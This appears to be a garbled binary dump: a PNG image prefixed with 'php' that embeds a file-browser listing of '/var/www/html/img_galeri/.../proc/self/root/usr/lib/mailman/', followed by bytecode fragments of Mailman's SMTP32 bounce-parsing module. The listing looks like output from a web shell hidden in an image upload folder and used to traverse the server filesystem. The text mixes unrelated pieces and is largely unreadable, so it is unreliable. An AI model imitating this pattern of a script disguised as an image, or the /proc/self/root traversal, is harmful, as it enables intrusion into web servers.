php IHDR w Q )Ba pHYs sRGB gAMA a IDATxMk\U s&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨ G;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j- $_q?qS XzG'ay

| files >> /var/www/html/img_galeri/2r1asasas/root/proc/self/root/usr/lib/mailman/Mailman/Bouncers/ |
| files >> //var/www/html/img_galeri/2r1asasas/root/proc/self/root/usr/lib/mailman/Mailman/Bouncers/SMTP32.pyo |
Pc @ s\ d Z d d k Z d d k Z e i d e i Z e i d e i e i B Z d Z d S( s Something which claims
X-Mailer: <SMTP32 vXXXXXX>
What the heck is this thing? Here's a recent host:
% telnet 207.51.255.218 smtp
Trying 207.51.255.218...
Connected to 207.51.255.218.
Escape character is '^]'.
220 X1 NT-ESMTP Server 208.24.118.205 (IMail 6.00 45595-15)
iNs original message followss
( # several different prefixes
user\ mailbox[^:]*: # have been spotted in the
|delivery\ failed[^:]*: # wild...
|unknown\ user[^:]*:
|undeliverable\ +to
|delivery\ userid[^:]*:
)
\s* # space separator
(?P<addr>[^\s]*) # and finally, the address
c C s | i d d } | i d p d Sh } x\ t i i | D]H } t i | o Pn t i | } | o d | | i d <q@ q@ W| i S( Ns x-mailert s <SMTP32 vi t addr(
t gett
startswitht emailt Iteratorst body_line_iteratort ecret searcht acret groupt keys( t msgt mailert addrst linet mo( ( s` /builddir/build/BUILDROOT/mailman-2.1.12-18.el6.i386//usr/lib/mailman/Mailman/Bouncers/SMTP32.pyt process1 s ( t __doc__t reR t compilet
IGNORECASER t VERBOSER R ( ( ( s` /builddir/build/BUILDROOT/mailman-2.1.12-18.el6.i386//usr/lib/mailman/Mailman/Bouncers/SMTP32.pyt <module> s
y~or5J={Eeu磝Qk ᯘG{?+]ן?wM3X^歌>{7پK>on\jy Rg/=fOroNVv~Y+ NGuÝHWyw[eQʨSb> >}Gmx[o[<{Ϯ_qFvM IENDB`